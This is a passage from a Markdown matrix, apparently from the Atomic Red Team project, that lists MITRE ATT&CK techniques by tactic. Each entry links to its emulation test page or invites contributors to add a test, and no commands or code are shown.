Capture](../../T1113/T1113.md) | Scheduled Transfer [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Data Encoding: Standard Encoding](../../T1132.001/T1132.001.md) | Direct Network Flood [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| Spearphishing Link [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Scheduled Task/Job: Cron](../../T1053.003/T1053.003.md) | Boot or Logon Initialization Scripts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | File System Permissions Weakness [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Hidden Window [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Input Capture: Keylogging](../../T1056.001/T1056.001.md) | Permission Groups Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | SSH [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Adversary-in-the-Middle [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exfiltration Over Other Network Medium [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Domain Generation Algorithms [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Stored Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| Spearphishing Link [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Scheduled Task/Job [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | LC_LOAD_DYLIB Addition [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Elevated Execution with Prompt [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Embedded Payloads [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Brute Force: Password Guessing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Device Driver Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Application Deployment Software [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Input Capture: Keylogging](../../T1056.001/T1056.001.md) | Exfiltration Over Bluetooth [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Application Layer Protocol: DNS [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | External Defacement [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| Phishing: Spearphishing Attachment [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Command and Scripting Interpreter: AppleScript](../../T1059.002/T1059.002.md) | Plist Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Create or Modify System Process [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Plist Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | OS Credential Dumping [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Account Discovery: Domain Account [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | SSH Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Audio Capture](../../T1123/T1123.md) | Automated Exfiltration [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Domain Fronting [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | OS Exhaustion Flood [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| Compromise Hardware Supply Chain [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Native API [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Modify Authentication Process: Pluggable Authentication Modules [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | LC_LOAD_DYLIB Addition [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Modify Authentication Process: Pluggable Authentication Modules [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Steal Web Session Cookie [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Security Software Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Remote Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Archive via Custom Method [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exfiltration Over Symmetric Encrypted Non-C2 Protocol [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Symmetric Cryptography [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Application Exhaustion Flood [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| Supply Chain Compromise [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Source [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | File System Permissions Weakness [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Abuse Elevation Control Mechanism: Sudo and Sudo Caching](../../T1548.003/T1548.003.md) | HISTCONTROL [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Securityd Memory [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Account Discovery: Local Account](../../T1087.001/T1087.001.md) | Remote Service Session Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Email Collection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exfiltration to Code Repository [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Fast Flux DNS [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Disk Wipe [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| Exploit Public-Facing Application [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Launchctl [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Create or Modify System Process [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Boot or Logon Autostart Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [File and Directory Permissions Modification: Linux and Mac File and Directory Permissions Modification](../../T1222.002/T1222.002.md) | Brute Force: Password Cracking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Virtualization/Sandbox Evasion: System Checks](../../T1497.001/T1497.001.md) | Software Deployment Tools [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Data from Removable Media [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Exfiltration Over Alternative Protocol - Exfiltration Over Asymmetric Encrypted Non-C2 Protocol](../../T1048.002/T1048.002.md) | Application Layer Protocol [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Stored Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| [Valid Accounts: Default Accounts](../../T1078.001/T1078.001.md) | AppleScript [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | External Remote Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Sudo Caching [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Email Hiding Rules [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Credentials from Password Stores: Keychain](../../T1555.001/T1555.001.md) | Permission Groups Discovery: Domain Groups [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exploitation of Remote Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Data Staged: Local Data Staging](../../T1074.001/T1074.001.md) | Exfiltration Over C2 Channel [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Custom Cryptographic Protocol [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Service Stop [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| Spearphishing Attachment [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Command and Scripting Interpreter [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | LC_LOAD_DYLIB Addition [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Scheduled Task/Job: Cron](../../T1053.003/T1053.003.md) | Rootkit [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Securityd Memory [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | System Service Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Internal Spearphishing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Automated Collection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Exfiltration Over Alternative Protocol](../../T1048/T1048.md) | Remote Access Software [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Application or System Exploitation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| Trusted Relationship [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Scripting [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Rc.common [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Startup Items [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Timestomp [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Password Managers [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Network Sniffing](../../T1040/T1040.md) | Lateral Tool Transfer [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Clipboard Data](../../T1115/T1115.md) | Exfiltration over USB [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Multilayer Encryption [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Disk Structure Wipe [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| Phishing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [System Services: Launchctl](../../T1569.001/T1569.001.md) | Boot or Logon Autostart Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Scheduled Task/Job [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Abuse Elevation Control Mechanism: Sudo and Sudo Caching](../../T1548.003/T1548.003.md) | [Network Sniffing](../../T1040/T1040.md) | [Network Share Discovery](../../T1135/T1135.md) | SSH Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Remote Data Staging [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Data Compressed [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Traffic Signaling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Runtime Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| Valid Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | XPC Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Scheduled Task/Job: Cron](../../T1053.003/T1053.003.md) | [Boot or Logon Initialization Scripts: Logon Script (Mac)](../../T1037.002/T1037.002.md) | Code Signing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Steal or Forge Kerberos Tickets [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Peripheral Device Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Data from Local System [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exfiltration to Text Storage Sites [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Standard Cryptographic Protocol [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Reflection Amplification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| Compromise Software Supply Chain [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | User Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Startup Items [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Process Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Masquerading: Match Legitimate Name or Location](../../T1036.005/T1036.005.md) | Credentials from Password Stores [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [System Information Discovery](../../T1082/T1082.md) | | Archive Collected Data: Archive via Library [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exfiltration Over Web Service: Exfiltration to Cloud Storage [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Protocol Tunneling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Service Exhaustion Flood [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| Domain Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Launchd [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Scheduled Task/Job [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Create or Modify System Process: Launch Daemon](../../T1543.004/T1543.004.md) | Masquerade File Type [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Unsecured Credentials](../../T1552/T1552.md) | Application Window Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Archive Collected Data [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Data Transfer Size Limits](../../T1030/T1030.md) | Domain Generation Algorithms [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Defacement [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| Spearphishing via Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Software Deployment Tools [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Login Item [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Valid Accounts: Default Accounts](../../T1078.001/T1078.001.md) | Hide Artifacts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Bash History [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Time Based Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | DHCP Spoofing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Data Encrypted [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Mail Protocols [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Defacement: Internal Defacement [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| Hardware Additions [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Graphical User Interface [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Browser Extensions](../../T1176/T1176.md) | [Event Triggered Execution: Trap](../../T1546.005/T1546.005.md) | [Virtualization/Sandbox Evasion: System Checks](../../T1497.001/T1497.001.md) | Credentials from Web Browsers [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Browser Bookmark Discovery](../../T1217/T1217.md) | | Web Portal Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exfiltration Over Physical Medium [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Communication Through Removable Media [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| Drive-by Compromise [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Command and Scripting Interpreter: Bash](../../T1059.004/T1059.004.md) | [Boot or Logon Initialization Scripts: Logon Script (Mac)](../../T1037.002/T1037.002.md) | [Hijack Execution Flow: LD_PRELOAD](../../T1574.006/T1574.006.md) | [Indicator Removal on Host: Clear Linux or Mac System Logs](../../T1070.002/T1070.002.md) | Private Keys [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [System Network Configuration Discovery](../../T1016/T1016.md) | | Video Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol](../../T1048.003/T1048.003.md) | External Proxy [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Account Access Removal](../../T1531/T1531.md) |
| Spearphishing via Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Inter-Process Communication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Traffic Signaling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Plist Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Disabling Security Tools [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Credentials from Password Stores: Credentials from Web Browsers](../../T1555.003/T1555.003.md) | Account Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Email Collection: Email Forwarding Rule [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Proxy [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Data Encrypted for Impact](../../T1486/T1486.md) |
| [Valid Accounts: Local Accounts](../../T1078.003/T1078.003.md) | Trap [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Launchctl [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Abuse Elevation Control Mechanism [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Stripped Payloads [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | DHCP Spoofing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [File and Directory Discovery](../../T1083/T1083.md) | | Data Staged [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Dynamic Resolution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Disk Content Wipe [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| | Exploitation for Client Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Create or Modify System Process: Launch Daemon](../../T1543.004/T1543.004.md) | [Abuse Elevation Control Mechanism: Setuid and Setgid](../../T1548.001/T1548.001.md) | [Subvert Trust Controls: Gatekeeper Bypass](../../T1553.001/T1553.001.md) | [Unsecured Credentials: Private Keys](../../T1552.004/T1552.004.md) | [System Network Connections Discovery](../../T1049/T1049.md) | | [Input Capture: GUI Input Capture](../../T1056.002/T1056.002.md) | | Multi-hop Proxy [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Endpoint Denial of Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| | Local Job Scheduling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Server Software Component: Web Shell [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Boot or Logon Autostart Execution: Login Items](../../T1547.015/T1547.015.md) | Code Signing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Brute Force: Password Spraying [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Virtualization/Sandbox Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Data from Network Shared Drive [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Web Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Runtime Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| | Command and Scripting Interpreter: Python [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Valid Accounts: Default Accounts](../../T1078.001/T1078.001.md) | Launchd [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Clear Network Connection History and Configurations [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Web Portal Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Process Discovery](../../T1057/T1057.md) | | Input Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | DNS Calculation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Transmitted Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| | System Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Event Triggered Execution: Trap](../../T1546.005/T1546.005.md) | [Event Triggered Execution: Emond](../../T1546.014/T1546.014.md) | [Indicator Removal on Host: Clear Command History](../../T1070.003/T1070.003.md) | Steal or Forge Authentication Certificates [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | User Activity Based Checks [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | ARP Cache Poisoning [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Multi-Stage Channels [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Resource Hijacking](../../T1496/T1496.md) |
| | Command and Scripting Interpreter: Visual Basic [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Hijack Execution Flow: LD_PRELOAD](../../T1574.006/T1574.006.md) | Sudo [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Deobfuscate/Decode Files or Information](../../T1140/T1140.md) | [Unsecured Credentials: Bash History](../../T1552.003/T1552.003.md) | [Permission Groups Discovery: Local Groups](../../T1069.001/T1069.001.md) | | Data from Information Repositories [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Port Knocking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Transmitted Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| | Space after Filename [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Create Account: Local Account](../../T1136.001/T1136.001.md) | [Boot or Logon Autostart Execution: Kernel Modules and Extensions](../../T1547.006/T1547.006.md) | Impair Defenses [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Unsecured Credentials: Credentials In Files](../../T1552.001/T1552.001.md) | [Password Policy Discovery](../../T1201/T1201.md) | | | | Multiband Communication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Data Destruction](../../T1485/T1485.md) |
| | Malicious Link [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Plist Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Dylib Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Masquerading [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Web Cookies [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | System Location Discovery: System Language Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | File Transfer Protocols [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Network Denial of Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| | Scheduled Task/Job: At [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Re-opened Applications [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Hijack Execution Flow [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Email Collection: Mailbox Manipulation](../../T1070.008/T1070.008.md) | Input Prompt [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | System Location Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | One-Way Communication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Firmware Corruption [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| | | Redundant Access [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Valid Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Process Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Forge Web Credentials [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Software Discovery: Security Software Discovery](../../T1518.001/T1518.001.md) | | | | [Proxy: Multi-hop Proxy](../../T1090.003/T1090.003.md) | Inhibit System Recovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| | | [SSH Authorized Keys](../../T1098.004/T1098.004.md) | Exploitation for Privilege Escalation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Traffic Signaling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Multi-Factor Authentication Request Generation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Remote System Discovery](../../T1018/T1018.md) | | | | Data Obfuscation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Disk Content Wipe [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| | | Kernel Modules and Extensions [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Event Triggered Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Signed Binary Proxy Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exploitation for Credential Access [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Network Service Discovery](../../T1046/T1046.md) | | | | [Non-Standard Port](../../T1571/T1571.md) | [System Shutdown/Reboot](../../T1529/T1529.md) |
